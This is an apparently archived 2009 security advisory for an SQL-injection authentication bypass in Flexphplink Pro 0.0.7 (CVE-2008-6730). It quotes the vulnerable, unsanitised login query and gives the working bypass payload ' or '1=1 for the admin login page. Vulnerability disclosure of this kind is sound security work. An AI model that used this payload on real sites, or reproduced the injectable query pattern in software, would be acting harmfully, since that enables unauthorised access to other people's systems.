Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability

2009-04-20 / 2009-04-21

Credit: x0r

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-6730

CWE: CWE-89

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphplink Pro
Version: 0.0.7
Download: http://www.china-on-site.com/flexphplink/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Visit My Site Pls :P

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.